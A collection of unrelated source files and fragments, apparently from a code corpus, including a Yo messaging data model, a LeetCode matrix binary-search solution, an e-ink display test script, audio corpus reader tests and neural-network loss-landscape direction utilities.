location_city = StringField()
# Optional max 30 chars of text.
text = StringField()
# Optional max 30 chars of additional information.
context = StringField()
# Optional link to be opened on tapping left button. StringField because sms: link is a valid link
left_link = StringField()
# Optional link to be opened on tapping right button. StringField because sms: link is a valid link
right_link = StringField()
# Optional link attachment.
link = URLField()
# Optional link for thumbnail.
thumbnail_url = URLField()
# Optional photo.
photo = ReferenceField('Image')
# Optional cover image (Yo Byte).
cover = ReferenceField('Image')
# content type returned by a head request to the link
link_content_type = StringField()
# Optional parent Yo. This should be set by e.g. welcome links.
parent = ReferenceField('self')
# Optional origin Yo. This should be set by when forwarding a yo.
origin_yo = ReferenceField('self')
# Boolean indicator for location
sent_location = BooleanField()
# Recipient count.
sent_count = LongField()
# Optional link attachment.
short_link = URLField()
# Optional link attachment.
sound = StringField()
# String field to specify status
status = StringField()
# reference for what header to use for the payload
header = ReferenceField(Header)
# usec field indicating what time this yo is scheduled for
scheduled_for = LongField()
# denotes which schedule this belongs to
schedule_name = StringField()
# The token used to send this yo.
yo_token = ReferenceField(YoToken, default=None)
# For localized Yos
region = ReferenceField(Region, default=None)
# The context id this was sent from (provided by client).
context_id = StringField()
    # The two available responses for the Yo in the format "left.title", e.g. "nope.yep"
response_pair = StringField()
question = StringField()
left_replies_count = LongField()
right_replies_count = LongField()
left_share_template = StringField()
right_share_template = StringField()
left_reply = StringField()
right_reply = StringField()
user_info = DictField()
app_id = StringField()
    # The two available responses for the Yo in the format "left.title", e.g. "nope.yep"
sent_add_response_preflight_push = BooleanField()
def __str__(self):
return 'id=%s' % self.yo_id
def save(self):
if not self.created_date:
self.created_date = datetime.now()
return super(Yo, self).save()
def has_children(self):
return self.broadcast or self.is_group_yo or self.recipients and len(self.recipients) > 1
def has_content(self):
flattened_yo = self.get_flattened_yo()
if flattened_yo.location:
return True
if flattened_yo.link:
return True
if flattened_yo.photo:
return True
if flattened_yo.cover:
return True
return False
def should_trigger_response(self):
# Never trigger a response when sending to multiple recipients
if self.has_children():
return False
# If there is no recipient no need to go further
if not self.recipient:
return False
# If there is a callback to be triggered no need to go further
if self.recipient.callback:
return False
# Prevent possible callback loops
if self.sender and self.sender == self.recipient:
return False
# Never trigger a callback if yo has a parent
# This prevents broadcasts as well as welcome links
if self.parent:
return False
# If the recipient is not in the store don't allow a response
if not self.recipient.in_store:
return False
return True
def should_trigger_callback(self):
if self.reply_to:
if self.reply_to.parent:
return self.reply_to.parent.sender.callback or self.reply_to.parent.sender.callbacks
else:
return self.reply_to.sender.callback or self.reply_to.sender.callbacks
# If there is no callback to be triggered no need to go further
if not self.recipient:
return False
# If there is no callback to be triggered no need to go further
if not self.recipient.callback:
return False
# Never trigger a callback during a broadcast
if self.broadcast:
return False
# Prevent possible callback loops
if self.sender and self.sender == self.recipient:
return False
if self.parent:
# Never trigger a callback if yo has a parent
# This prevents broadcasts as well as welcome links
return False
return True
def should_trigger_oauth_callback(self):
# Only perform callbacks for Yos that are replies to the originating oauth client
if not self.reply_to:
return False
if not self.reply_to.oauth_client:
return False
# If there is no callback to be triggered no need to go further
if self.reply_to.oauth_client and not self.reply_to.oauth_client.callback_url:
return False
# Prevent possible callback loops
if self.sender and self.sender == self.recipient:
return False
if self.parent:
# Never trigger a callback if yo has a parent
# This prevents broadcasts as well as welcome links
return False
return True
@property
def yo_id(self):
return str(self.id) if self.id else None
@classmethod
def priority_for_status(cls, status):
return STATUS_PRIORITY_MAP.get(status, -1)
@property
def is_read(self):
read_priority = self.priority_for_status('read')
status_priority = self.priority_for_status(self.status)
return status_priority >= read_priority
@property
def is_received(self):
received_priority = self.priority_for_status('received')
status_priority = self.priority_for_status(self.status)
return status_priority >= received_priority
def get_type(self):
yo_type = ''
flattened_yo = self.get_flattened_yo()
if flattened_yo.link:
yo_type = 'link'
if flattened_yo.location:
yo_type = 'location'
if flattened_yo.photo:
yo_type = 'photo'
if (flattened_yo.link_content_type and
flattened_yo.link_content_type.startswith('image')):
yo_type = 'photo'
return yo_type
def get_flattened_yo(self):
flattened_yo = FlattenedYo()
flattened_yo.origin_yo_id = self.yo_id
flattened_yo.origin_sender = None
flattened_yo.location_str = None
flattened_yo.parent_yo_id = None
flattened_yo.group = None
if self.recipient and self.recipient.is_group:
flattened_yo.group = self.recipient
        # NOTE: mongoengine.Document iterators use the private field
# _fields_ordered so that you don't need to worry about
# callables and other private attrs
for attr in self:
setattr(flattened_yo, attr, getattr(self, attr))
if self.parent and self.parent.has_children():
flattened_yo.parent_yo_id = self.parent.yo_id
if self.parent.recipient and self.parent.recipient.is_group:
flattened_yo.group = self.parent.recipient
# Only set values from the parent if they aren't already set
# in the child
if not flattened_yo.origin_yo:
flattened_yo.origin_yo_id = self.parent.yo_id
for attr in self.parent:
if not getattr(flattened_yo, attr):
setattr(flattened_yo, attr, getattr(self.parent, attr))
if flattened_yo.location:
flattened_yo.location_str = '%s;%s' % (flattened_yo.location[0],
flattened_yo.location[1])
if (flattened_yo.origin_yo and flattened_yo.origin_yo.parent and
flattened_yo.origin_yo.parent.has_children()):
flattened_yo.origin_yo = flattened_yo.origin_yo.parent
if flattened_yo.origin_yo:
flattened_yo.origin_yo_id = flattened_yo.origin_yo.yo_id
flattened_yo.origin_sender = flattened_yo.origin_yo.sender
flattened_yo.yo_id = self.yo_id
flattened_yo.left_link = self.left_link
flattened_yo.right_link = self.right_link
# A link and photo should never exist at the same time
        # So overriding the link here should be fine.
if flattened_yo.photo:
flattened_yo.link = flattened_yo.photo.make_full_url()
flattened_yo.short_link = flattened_yo.photo.short_link
return flattened_yo
def get_flattened_dict(self):
flattened_yo = self.get_flattened_yo()
origin_sender = None
if flattened_yo.origin_sender:
origin_sender = flattened_yo.origin_sender.username
recipient = None
if flattened_yo.recipient:
recipient = flattened_yo.recipient.username
cover = None
if flattened_yo.cover:
cover = flattened_yo.cover.make_full_url()
flattened_dict = {
'broadcast': flattened_yo.broadcast,
'cover': cover,
'created_at': flattened_yo.created,
'is_favorite': bool(flattened_yo.is_favorite),
'is_group_yo': bool(flattened_yo.is_group_yo),
'is_read': self.is_read,
'is_received': self.is_received,
'link': flattened_yo.link,
'location': flattened_yo.location_str,
'origin_sender': origin_sender,
'origin_yo_id': flattened_yo.origin_yo_id,
'recipient': recipient,
'recipient_count': flattened_yo.recipient_count,
'sender': flattened_yo.sender.username,
'short_link': flattened_yo.short_link,
'status': flattened_yo.status,
'yo_id': flattened_yo.yo_id}
return flattened_dict
def get_sender(self, safe=False):
"""Get the sender from the parent if needed.
params:
safe - Returns a new yoapi.models.User instead of None
"""
sender = self.sender
if sender:
return sender
parent = self.parent
if parent:
sender = parent.sender
if safe and not sender:
sender = User()
return sender
def get_friend(self, user, safe=False):
"""Get the user whom sent or received this Yo that is not
the supplied user.
params:
user - a valid yoapi.models.User object
safe - Returns a new yoapi.models.User instead of None
"""
sender = self.get_sender()
recipient = self.recipient
if user == sender:
friend = recipient
elif user == recipient:
friend = sender
else:
friend = None
if safe and isinstance(self.sender, (None.__class__, DBRef)):
if isinstance(friend, DBRef):
friend = User(id=friend.value)
else:
friend = User()
return friend
def get_status_dict(self, user=None):
flattened_yo = self.get_flattened_yo()
original_status = flattened_yo.status
        # If the yo has content, "dismissed" means they truly didn't read it.
if self.has_content() and original_status == 'dismissed':
original_status = 'received'
        # If a yo does not have content, then as long as it was dismissed it
        # still counts as read.
status_map = {'received': 'delivered',
'dismissed': 'read',
'read': 'read',
'pending': 'sent',
'sent': 'sent'}
        # It is safest to treat any other status as sent.
status = status_map.get(original_status, 'sent')
# If the current yo was sent by someone other than the specified user
# mark it as delivered.
status = status if flattened_yo.sender == user else 'received'
# The username to be returned is the opposite of the specified user.
if user != flattened_yo.sender:
username = flattened_yo.sender.username
user_id = flattened_yo.sender.user_id
elif flattened_yo.recipient:
username = flattened_yo.recipient.username
user_id = flattened_yo.recipient.user_id
else:
# This should only happen with legacy group yos.
return None
status_dict = {
'status': status,
'original_status': flattened_yo.status,
'username': username,
'user_id': user_id,
'yo_id': flattened_yo.yo_id,
'type': self.get_type(),
'time': flattened_yo.updated or flattened_yo.created
}
parent = flattened_yo.parent if flattened_yo.parent else flattened_yo
group = parent.recipient
if flattened_yo.is_group_yo and group and group.is_group:
status_dict.update({'group_username': group.username,
'group_user_id': group.user_id})
return status_dict
def has_dbrefs(self):
"""Checks if there are any users that could not be
dereferenced"""
if isinstance(self, DBRef):
return True
if isinstance(self.sender, DBRef):
return True
if isinstance(self.recipient, DBRef):
return True
if isinstance(self.parent, DBRef):
return True
if self.parent and isinstance(self.parent.sender, DBRef):
return True
if self.parent and isinstance(self.parent.recipient, DBRef):
return True
return False
class FlattenedYo(object):
"""Psuedo class used when flattening a yo"""
pass
|
the-stack_106_13036
|
# Kth Smallest Element in a Sorted Matrix: https://leetcode.com/problems/kth-smallest-element-in-a-sorted-matrix/
# Given an n x n matrix where each of the rows and columns are sorted in ascending order, return the kth smallest element in the matrix.
# Note that it is the kth smallest element in the sorted order, not the kth distinct element.
# A near-optimal approach that is neat is to use a heap: simply keep adding elements from each row and
# pop the smallest k times, which is pretty optimal at O(min(k, n) + k log n) time and O(min(k, n)) space.
# For this problem the optimal solution is a binary search over values, where you check whether the middle value has k elements below it.
# I will be focusing on this, as the heap solution takes all of 5 min to code but the binary search is a lot harder.
class Solution:
def countLessThanMid(self, matrix, mid, smaller, larger):
count, n = 0, len(matrix)
row, col = n - 1, 0
while row >= 0 and col < n:
if matrix[row][col] > mid:
larger = min(larger, matrix[row][col])
row -= 1
else:
smaller = max(smaller, matrix[row][col])
count += row + 1
col += 1
return count, smaller, larger
def kthSmallest(self, matrix, k: int) -> int:
n = len(matrix)
        # Guaranteed to be square
        # So this is a basic binary search, but we use the value instead of the index to find
        # the correct element
start, end = matrix[0][0], matrix[n-1][n-1]
while start < end:
mid = start + (end - start) / 2
smaller, larger = matrix[0][0], matrix[n-1][n-1]
count, smaller, larger = self.countLessThanMid(
matrix, mid, smaller, larger)
if count == k:
return smaller
elif count < k:
start = larger
else:
end = smaller
return start
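# A minimal, hedged usage sketch of the class above; the matrix and k value
# are illustrative only (the 8th smallest element of this matrix is 13).
if __name__ == "__main__":
    sample = [[1, 5, 9],
              [10, 11, 13],
              [12, 13, 15]]
    print(Solution().kthSmallest(sample, 8))  # expected output: 13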
# Score Card
# Did I need hints? Yes
# Did you finish within 30 min? 28
# Was the solution optimal? This is optimal
# Were there any bugs? No
# 3 5 5 5 = 4.5
|
the-stack_106_13038
|
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
"""Simple test script for 1.54" 152x152 tri-color display.
Supported products:
* Adafruit 1.54" Tri-Color Display Breakout
* https://www.adafruit.com/product/3625
"""
import time
import board
import displayio
import adafruit_il0373
displayio.release_displays()
# This pinout works on a Feather M4 and may need to be altered for other boards.
spi = board.SPI() # Uses SCK and MOSI
epd_cs = board.D9
epd_dc = board.D10
epd_reset = board.D5
epd_busy = board.D6
display_bus = displayio.FourWire(
spi, command=epd_dc, chip_select=epd_cs, reset=epd_reset, baudrate=1000000
)
time.sleep(1)
display = adafruit_il0373.IL0373(
display_bus, width=152, height=152, busy_pin=epd_busy, highlight_color=0xFF0000
)
g = displayio.Group()
f = open("/display-ruler.bmp", "rb")
pic = displayio.OnDiskBitmap(f)
t = displayio.TileGrid(pic, pixel_shader=displayio.ColorConverter())
g.append(t)
display.show(g)
display.refresh()
print("refreshed")
time.sleep(120)
|
the-stack_106_13040
|
import os
import pytest
import requests_mock
from audiomate import corpus
from audiomate.corpus import io
from audiomate.corpus.io import rouen
from tests import resources
from . import reader_test as rt
@pytest.fixture
def downloader():
return io.RouenDownloader()
@pytest.fixture()
def zip_data():
with open(resources.get_resource_path(['sample_files', 'zip_sample_with_subfolder.zip']), 'rb') as f:
return f.read()
class TestRouenDownloader:
def test_download(self, zip_data, downloader, tmpdir):
target_folder = tmpdir.strpath
with requests_mock.Mocker() as mock:
mock.get(rouen.DATA_URL, content=zip_data)
downloader.download(target_folder)
assert os.path.isfile(os.path.join(target_folder, 'a.txt'))
assert os.path.isfile(os.path.join(target_folder, 'subsub', 'b.txt'))
assert os.path.isfile(os.path.join(target_folder, 'subsub', 'c.txt'))
class TestRouenReader(rt.CorpusReaderTest):
SAMPLE_PATH = resources.sample_corpus_path('rouen')
FILE_TRACK_BASE_PATH = SAMPLE_PATH
EXPECTED_NUMBER_OF_TRACKS = 4
EXPECTED_TRACKS = [
rt.ExpFileTrack('avion1', 'avion1.wav'),
rt.ExpFileTrack('avion2', 'avion2.wav'),
rt.ExpFileTrack('bus1', 'bus1.wav'),
rt.ExpFileTrack('metro_rouen22', 'metro_rouen22.wav'),
]
EXPECTED_NUMBER_OF_ISSUERS = 0
EXPECTED_NUMBER_OF_UTTERANCES = 4
EXPECTED_UTTERANCES = [
rt.ExpUtterance('avion1', 'avion1', None, 0, float('inf')),
rt.ExpUtterance('avion2', 'avion2', None, 0, float('inf')),
rt.ExpUtterance('bus1', 'bus1', None, 0, float('inf')),
rt.ExpUtterance('metro_rouen22', 'metro_rouen22', None, 0, float('inf')),
]
EXPECTED_LABEL_LISTS = {
'avion1': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
'avion2': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
'bus1': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
'metro_rouen22': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
}
EXPECTED_LABELS = {
'avion1': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'avion', 0, float('inf'))],
'avion2': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'avion', 0, float('inf'))],
'bus1': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'bus', 0, float('inf'))],
'metro_rouen22': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'metro_rouen', 0, float('inf'))],
}
EXPECTED_NUMBER_OF_SUBVIEWS = 0
def load(self):
return io.RouenReader().load(self.SAMPLE_PATH)
|
the-stack_106_13042
|
# Production settings
import os
from unipath import Path
PROJECT_ROOT = Path(__file__).ancestor(2)
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (("Paul Hallett", "[email protected]"),)
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
MANAGERS = ADMINS
BASE_URL = "http://pokeapi.co"
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [".pokeapi.co", "localhost", "127.0.0.1"]
TIME_ZONE = "Europe/London"
LANGUAGE_CODE = "en-gb"
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Explicitly define test runner to avoid warning messages on test execution
TEST_RUNNER = "django.test.runner.DiscoverRunner"
SECRET_KEY = "4nksdock439320df*(^x2_scm-o$*py3e@-awu-n^hipkm%2l$sw$&2l#"
MIDDLEWARE = [
"corsheaders.middleware.CorsMiddleware",
"django.middleware.common.CommonMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "config.urls"
WSGI_APPLICATION = "config.wsgi.application"
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql_psycopg2",
"NAME": "pokeapi_co_db",
"USER": "root",
"PASSWORD": "pokeapi",
"HOST": "localhost",
"PORT": "",
"CONN_MAX_AGE": 30,
}
}
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
},
}
}
SECRET_KEY = os.environ.get(
"SECRET_KEY", "ubx+22!jbo(^x2_scm-o$*py3e@-awu-n^hipkm%2l$sw$&2l#"
)
CUSTOM_APPS = (
"tastypie",
"pokemon_v2",
)
INSTALLED_APPS = (
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.admin",
"django.contrib.humanize",
"corsheaders",
"rest_framework",
"cachalot",
) + CUSTOM_APPS
API_LIMIT_PER_PAGE = 1
TASTYPIE_DEFAULT_FORMATS = ["json"]
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_METHODS = "GET"
CORS_URLS_REGEX = r"^/api/.*$"
REST_FRAMEWORK = {
"DEFAULT_RENDERER_CLASSES": ("drf_ujson.renderers.UJSONRenderer",),
"DEFAULT_PARSER_CLASSES": ("drf_ujson.renderers.UJSONRenderer",),
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
"PAGE_SIZE": 20,
"PAGINATE_BY": 20,
}
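# With LimitOffsetPagination and PAGE_SIZE = 20, list endpoints page via query
# parameters such as /api/v2/pokemon/?limit=20&offset=40 (a hedged illustration;
# the endpoint path is an assumption, the limit/offset parameters come from DRF).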
|
the-stack_106_13043
|
# -*- coding: utf-8 -*-
import tkinter as tk
import tkinter.font as tk_font
from thonny import get_workbench, ui_utils
from thonny.common import ValueInfo
from thonny.ui_utils import TreeFrame
MAX_REPR_LENGTH_IN_GRID = 100
def format_object_id(object_id):
# this format aligns with how Python shows memory addresses
if object_id is None:
return None
else:
return "0x" + hex(object_id)[2:].upper() # .rjust(8,'0')
def parse_object_id(object_id_repr):
return int(object_id_repr, base=16)
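# Hedged round-trip example for the two helpers above (values are illustrative):
#   format_object_id(3735928559) -> '0xDEADBEEF'
#   parse_object_id('0xDEADBEEF') -> 3735928559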
class MemoryFrame(TreeFrame):
def __init__(self, master, columns):
TreeFrame.__init__(self, master, columns)
font = tk_font.nametofont("TkDefaultFont").copy()
font.configure(underline=True)
self.tree.tag_configure("hovered", font=font)
def stop_debugging(self):
self._clear_tree()
def show_selected_object_info(self):
iid = self.tree.focus()
if iid != "":
# NB! Assuming id is second column!
id_str = self.tree.item(iid)["values"][1]
if id_str in ["", None, "None"]:
return
object_id = parse_object_id(id_str)
get_workbench().event_generate("ObjectSelect", object_id=object_id)
class VariablesFrame(MemoryFrame):
def __init__(self, master):
MemoryFrame.__init__(self, master, ("name", "id", "value"))
self.tree.column("name", width=120, anchor=tk.W, stretch=False)
self.tree.column("id", width=450, anchor=tk.W, stretch=True)
self.tree.column("value", width=450, anchor=tk.W, stretch=True)
self.tree.heading("name", text=_("Name"), anchor=tk.W)
self.tree.heading("id", text=_("Value ID"), anchor=tk.W)
self.tree.heading("value", text=_("Value"), anchor=tk.W)
get_workbench().bind("ShowView", self._update_memory_model, True)
get_workbench().bind("HideView", self._update_memory_model, True)
self._update_memory_model()
self.tree.tag_configure(
"group_title",
font="BoldTkDefaultFont",
background=ui_utils.lookup_style_option(".", "background"),
)
def destroy(self):
MemoryFrame.destroy(self)
get_workbench().unbind("ShowView", self._update_memory_model)
get_workbench().unbind("HideView", self._update_memory_model)
def _update_memory_model(self, event=None):
if get_workbench().in_heap_mode():
self.tree.configure(displaycolumns=("name", "id"))
# self.tree.columnconfigure(1, weight=1, width=400)
# self.tree.columnconfigure(2, weight=0)
else:
self.tree.configure(displaycolumns=("name", "value"))
# self.tree.columnconfigure(1, weight=0)
# self.tree.columnconfigure(2, weight=1, width=400)
def update_variables(self, all_variables):
self._clear_tree()
if not all_variables:
return
if isinstance(all_variables, list):
groups = all_variables
else:
groups = [("", all_variables)]
for group_title, variables in groups:
if group_title:
node_id = self.tree.insert("", "end", tags=("group_title",))
self.tree.set(node_id, "name", group_title)
for name in sorted(variables.keys()):
if not name.startswith("__"):
node_id = self.tree.insert("", "end", tags="item")
self.tree.set(node_id, "name", name)
if isinstance(variables[name], ValueInfo):
description = variables[name].repr
id_str = variables[name].id
else:
description = variables[name]
id_str = None
self.tree.set(node_id, "id", format_object_id(id_str))
self.tree.set(node_id, "value", description)
def on_select(self, event):
self.show_selected_object_info()
|
the-stack_106_13044
|
"""
Manipulate network parameters and setup random directions with normalization.
"""
import torch
import copy
from os.path import exists, commonprefix
import h5py
import h5_util
import model_loader
################################################################################
# Supporting functions for weights manipulation
################################################################################
def get_weights(net):
""" Extract parameters from net, and return a list of tensors"""
return [p.data for p in net.parameters()]
def set_weights(net, weights, directions=None, step=None):
"""
Overwrite the network's weights with a specified list of tensors
or change weights along directions with a step size.
"""
if directions is None:
# You cannot specify a step length without a direction.
for (p, w) in zip(net.parameters(), weights):
            p.data.copy_(w.type_as(p.data))
else:
assert step is not None, 'If a direction is specified then step must be specified as well'
if len(directions) == 2:
dx = directions[0]
dy = directions[1]
changes = [d0*step[0] + d1*step[1] for (d0, d1) in zip(dx, dy)]
else:
changes = [d*step for d in directions[0]]
for (p, w, d) in zip(net.parameters(), weights, changes):
            p.data = w + torch.Tensor(d).type_as(w)
def set_states(net, states, directions=None, step=None):
"""
Overwrite the network's state_dict or change it along directions with a step size.
"""
if directions is None:
net.load_state_dict(states)
else:
assert step is not None, 'If direction is provided then the step must be specified as well'
if len(directions) == 2:
dx = directions[0]
dy = directions[1]
changes = [d0*step[0] + d1*step[1] for (d0, d1) in zip(dx, dy)]
else:
changes = [d*step for d in directions[0]]
new_states = copy.deepcopy(states)
assert (len(new_states) == len(changes))
for (k, v), d in zip(new_states.items(), changes):
d = torch.tensor(d)
            v.add_(d.type_as(v))
net.load_state_dict(new_states)
def get_random_weights(weights):
"""
Produce a random direction that is a list of random Gaussian tensors
with the same shape as the network's weights, so one direction entry per weight.
"""
return [torch.randn(w.size()) for w in weights]
def get_random_states(states):
"""
Produce a random direction that is a list of random Gaussian tensors
with the same shape as the network's state_dict(), so one direction entry
per weight, including BN's running_mean/var.
"""
return [torch.randn(w.size()) for k, w in states.items()]
def get_diff_weights(weights, weights2):
""" Produce a direction from 'weights' to 'weights2'."""
return [w2 - w for (w, w2) in zip(weights, weights2)]
def get_diff_states(states, states2):
""" Produce a direction from 'states' to 'states2'."""
return [v2 - v for (k, v), (k2, v2) in zip(states.items(), states2.items())]
################################################################################
# Normalization Functions
################################################################################
def normalize_direction(direction, weights, norm='filter'):
"""
        Rescale the direction so that it has a similar norm to the corresponding
        model parameters at the chosen level (filter, layer, or weight).
Args:
          direction: a variable (or list of variables) of the random direction for one layer
weights: a variable of the original model for one layer
norm: normalization method, 'filter' | 'layer' | 'weight'
"""
if norm == 'filter':
# Rescale the filters (weights in group) in 'direction' so that each
# filter has the same norm as its corresponding filter in 'weights'.
for d, w in zip(direction, weights):
d.mul_(w.norm()/(d.norm() + 1e-10))
elif norm == 'layer':
# Rescale the layer variables in the direction so that each layer has
# the same norm as the layer variables in weights.
direction.mul_(weights.norm()/direction.norm())
elif norm == 'weight':
# Rescale the entries in the direction so that each entry has the same
# scale as the corresponding weight.
direction.mul_(weights)
elif norm == 'dfilter':
# Rescale the entries in the direction so that each filter direction
# has the unit norm.
for d in direction:
d.div_(d.norm() + 1e-10)
elif norm == 'dlayer':
# Rescale the entries in the direction so that each layer direction has
# the unit norm.
direction.div_(direction.norm())
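# Minimal sketch (added for illustration, not part of the original module):
# the 'filter' branch above rescales every filter d_i of a random direction so
# that ||d_i|| matches ||w_i|| of the corresponding model filter. The layer
# shape used below is hypothetical.
def _filter_normalization_example():
    w = torch.randn(8, 3, 3, 3)   # pretend conv layer: 8 filters of shape 3x3x3
    d = torch.randn_like(w)       # random direction with the same shape
    normalize_direction(d, w, norm='filter')
    # each filter of d now has (almost) the same norm as the matching filter of w
    return [(d[i].norm().item(), w[i].norm().item()) for i in range(w.size(0))]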
def normalize_directions_for_weights(direction, weights, norm='filter', ignore='biasbn'):
"""
The normalization scales the direction entries according to the entries of weights.
"""
assert(len(direction) == len(weights))
for d, w in zip(direction, weights):
if d.dim() <= 1:
if ignore == 'biasbn':
d.fill_(0) # ignore directions for weights with 1 dimension
else:
d.copy_(w) # keep directions for weights/bias that are only 1 per node
else:
normalize_direction(d, w, norm)
def normalize_directions_for_states(direction, states, norm='filter', ignore='ignore'):
assert(len(direction) == len(states))
for d, (k, w) in zip(direction, states.items()):
if d.dim() <= 1:
if ignore == 'biasbn':
d.fill_(0) # ignore directions for weights with 1 dimension
else:
d.copy_(w) # keep directions for weights/bias that are only 1 per node
else:
normalize_direction(d, w, norm)
def ignore_biasbn(directions):
""" Set bias and bn parameters in directions to zero """
for d in directions:
if d.dim() <= 1:
d.fill_(0)
################################################################################
# Create directions
################################################################################
def create_target_direction(net, net2, dir_type='states'):
"""
Setup a target direction from one model to the other
Args:
net: the source model
net2: the target model with the same architecture as net.
dir_type: 'weights' or 'states', type of directions.
Returns:
direction: the target direction from net to net2 with the same dimension
as weights or states.
"""
assert (net2 is not None)
# direction between net2 and net
if dir_type == 'weights':
w = get_weights(net)
w2 = get_weights(net2)
direction = get_diff_weights(w, w2)
elif dir_type == 'states':
s = net.state_dict()
s2 = net2.state_dict()
direction = get_diff_states(s, s2)
return direction
def create_random_direction(net, dir_type='weights', ignore='biasbn', norm='filter'):
"""
Setup a random (normalized) direction with the same dimension as
the weights or states.
Args:
net: the given trained model
dir_type: 'weights' or 'states', type of directions.
ignore: 'biasbn', ignore biases and BN parameters.
norm: direction normalization method, including
                'filter' | 'layer' | 'weight' | 'dlayer' | 'dfilter'
Returns:
direction: a random direction with the same dimension as weights or states.
"""
# random direction
if dir_type == 'weights':
weights = get_weights(net) # a list of parameters.
direction = get_random_weights(weights)
normalize_directions_for_weights(direction, weights, norm, ignore)
elif dir_type == 'states':
states = net.state_dict() # a dict of parameters, including BN's running mean/var.
direction = get_random_states(states)
normalize_directions_for_states(direction, states, norm, ignore)
return direction
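# Usage sketch (added for illustration, not part of the original module): a 1-D
# loss curve along one random, filter-normalized direction can be traced by
# perturbing a copy of the trained weights with set_weights(). The step values
# and the loss_fn callable below are hypothetical.
def _loss_curve_example(net, loss_fn, steps=(-1.0, -0.5, 0.0, 0.5, 1.0)):
    weights = get_weights(net)                       # trained weights, restored later
    direction = create_random_direction(net, dir_type='weights')
    losses = []
    for alpha in steps:
        set_weights(net, weights, directions=[direction], step=alpha)
        losses.append(loss_fn(net))
    set_weights(net, weights)                        # restore the original weights
    return losses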
def setup_direction(args, dir_file, net):
"""
Setup the h5 file to store the directions.
        - xdirection, ydirection: The perturbation direction added to the model.
The direction is a list of tensors.
"""
print('-------------------------------------------------------------------')
print('setup_direction')
print('-------------------------------------------------------------------')
# Skip if the direction file already exists
if exists(dir_file):
f = h5py.File(dir_file, 'r')
if (args.y and 'ydirection' in f.keys()) or 'xdirection' in f.keys():
f.close()
            print("%s is already set up" % dir_file)
return
f.close()
# Create the plotting directions
f = h5py.File(dir_file,'w') # create file, fail if exists
if not args.dir_file:
print("Setting up the plotting directions...")
if args.model_file2:
net2 = model_loader.load(args.dataset, args.model, args.model_file2)
xdirection = create_target_direction(net, net2, args.dir_type)
else:
xdirection = create_random_direction(net, args.dir_type, args.xignore, args.xnorm)
h5_util.write_list(f, 'xdirection', xdirection)
if args.y:
if args.same_dir:
ydirection = xdirection
elif args.model_file3:
net3 = model_loader.load(args.dataset, args.model, args.model_file3)
ydirection = create_target_direction(net, net3, args.dir_type)
else:
ydirection = create_random_direction(net, args.dir_type, args.yignore, args.ynorm)
h5_util.write_list(f, 'ydirection', ydirection)
f.close()
print ("direction file created: %s" % dir_file)
def name_direction_file(args):
""" Name the direction file that stores the random directions. """
if args.dir_file:
assert exists(args.dir_file), "%s does not exist!" % args.dir_file
return args.dir_file
dir_file = ""
file1, file2, file3 = args.model_file, args.model_file2, args.model_file3
# name for xdirection
if file2:
# 1D linear interpolation between two models
assert exists(file2), file2 + " does not exist!"
if file1[:file1.rfind('/')] == file2[:file2.rfind('/')]:
# model_file and model_file2 are under the same folder
dir_file += file1 + '_' + file2[file2.rfind('/')+1:]
else:
# model_file and model_file2 are under different folders
prefix = commonprefix([file1, file2])
prefix = prefix[0:prefix.rfind('/')]
dir_file += file1[:file1.rfind('/')] + '_' + file1[file1.rfind('/')+1:] + '_' + \
file2[len(prefix)+1: file2.rfind('/')] + '_' + file2[file2.rfind('/')+1:]
else:
dir_file += file1
dir_file += '_' + args.dir_type
if args.xignore:
dir_file += '_xignore=' + args.xignore
if args.xnorm:
dir_file += '_xnorm=' + args.xnorm
# name for ydirection
if args.y:
if file3:
assert exists(file3), "%s does not exist!" % file3
if file1[:file1.rfind('/')] == file3[:file3.rfind('/')]:
dir_file += file3
else:
# model_file and model_file3 are under different folders
dir_file += file3[:file3.rfind('/')] + '_' + file3[file3.rfind('/')+1:]
else:
if args.yignore:
dir_file += '_yignore=' + args.yignore
if args.ynorm:
dir_file += '_ynorm=' + args.ynorm
if args.same_dir: # ydirection is the same as xdirection
dir_file += '_same_dir'
# index number
if args.idx > 0: dir_file += '_idx=' + str(args.idx)
dir_file += ".h5"
return dir_file
def load_directions(dir_file):
""" Load direction(s) from the direction file."""
f = h5py.File(dir_file, 'r')
if 'ydirection' in f.keys(): # If this is a 2D plot
xdirection = h5_util.read_list(f, 'xdirection')
ydirection = h5_util.read_list(f, 'ydirection')
directions = [xdirection, ydirection]
else:
directions = [h5_util.read_list(f, 'xdirection')]
return directions
|
the-stack_106_13045
|
"""Contains tests for the private _solvers module"""
from numpy import insert, loadtxt, allclose
import pytest
from qmpy.solvers import schroedinger
from qmpy._fileio import _read_schrodinger
PROBLEMS = ['inf_potwell', 'fin_potwell', 'double_well', 'asym_potwell',
'harm_osci']
@pytest.mark.parametrize('problem', PROBLEMS)
def test_computing(problem):
"""
Tests whether the computed wavefunctions and energies match the
